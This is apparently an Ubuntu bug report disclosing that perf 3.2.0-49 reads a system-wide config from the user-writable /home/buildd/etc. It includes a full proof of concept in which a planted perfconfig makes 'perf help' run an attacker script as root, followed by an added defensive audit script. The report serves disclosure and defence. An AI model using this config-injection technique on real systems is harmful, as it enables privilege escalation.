Perf has 2 types of config files -- user and system-wide. The path to the system-wide config file is set at build time.
Instead of using the sane /etc/ path, Ubuntu uses /home/buildd/etc/. This means a user with write access to this directory may create a perfconfig file there, fill it with any data, and wait for another user to run perf. perf running as another user will read and parse this config file. The worst outcome is privilege escalation with arbitrary command execution when 'perf help' is run.
The attack has 2 constraints. First, an attacker has to own the /home/buildd/etc/ directory, which means only the 'buildd' user can carry out the attack.
Second, the attack is passive, so it can be carried out only against users who run perf.
The code for the privilege escalation is as follows:
$ which perf_3.2.0-49 | xargs strings | grep /home
/home/buildd
As root:
# useradd -m buildd
# su - buildd
$ id
uid=1001(buildd) gid=1001(buildd) groups=1001(buildd)
$ mkdir etc
$ echo >etc/perfconfig
$ cat >etc/perfconfig <<EOF
[man.shell]
cmd = /home/buildd/shell
[man]
viewer = shell
EOF
$ cat >shell <<EOF
#!/bin/bash
echo 'All your base are belong to us'
id
man "\$@"
EOF
$ chmod a+x shell
Now run these as another user:
# id
uid=0(root) gid=0(root) groups=0(root)
# perf help anything
All your base are belong to us
No manual entry for perf-anything
I also checked Fedora 19 and Debian 8; they are not vulnerable.
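To check an installed binary for the condition described above, the following audit script can be used. It is an added example, not part of the original report or of perf; it assumes GNU grep and GNU stat, and the function names and the etc/perfconfig suffix appended to each embedded prefix are illustrative choices based on the paths shown in the report.

```shell
#!/bin/sh
# Added example, not part of the original report. Assumes GNU grep and stat.

# List distinct /home, /tmp and /var/tmp paths compiled into a binary
# (the same idea as the `strings | grep /home` check in the report).
embedded_user_paths() {
    LC_ALL=C grep -aoE '/(home|tmp|var/tmp)/[A-Za-z0-9_./-]+' "$1" | sort -u
}

# audit_chain PATH [TRUSTED_UID] [STOP_DIR]
# Walk from PATH up to STOP_DIR (default /). Print every existing component
# that is not owned by TRUSTED_UID (default 0) or is group/world-writable.
# A missing component is skipped: whoever controls its nearest existing
# ancestor can create it. Symlinks are not resolved. Returns 1 on findings.
audit_chain() {
    p=$1; trusted=${2:-0}; stop=${3:-/}; bad=0
    while :; do
        if [ -e "$p" ]; then
            owner=$(stat -c %u "$p")
            mode=$(stat -c %a "$p")          # octal, e.g. 755 or 1777
            if [ "$owner" != "$trusted" ]; then
                echo "owner uid $owner: $p"; bad=1
            fi
            if [ $(( 0$mode & 022 )) -ne 0 ]; then
                echo "mode $mode (group/world-writable): $p"; bad=1
            fi
        fi
        if [ "$p" = "$stop" ] || [ "$p" = / ] || [ "$p" = . ]; then break; fi
        p=$(dirname "$p")
    done
    return $bad
}

# Usage: sh audit.sh /path/to/perf   (audits <prefix>/etc/perfconfig for
# each embedded prefix; the etc/perfconfig suffix follows the report)
if [ $# -gt 0 ]; then
    embedded_user_paths "$1" | while read -r prefix; do
        audit_chain "$prefix/etc/perfconfig"
    done
fi
```

Any line of output means a non-root account can plant or replace the system-wide config that other users' perf processes will parse.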
ProblemType: Bug
DistroRelease: Ubuntu 12.04
Package: linux-tools 3.2.0.49.59
Uname: Linux 3.2.0-49-generic x86_64
ApportVersion: 2.0.1-0ubuntu17.3
Architecture: amd64
Date: Mon Jul 29 21:10:20 2013
InstallationMedia: Ubuntu 12.04 LTS "Precise Pangolin" - Release amd64 (20120425)
SourcePackage: linux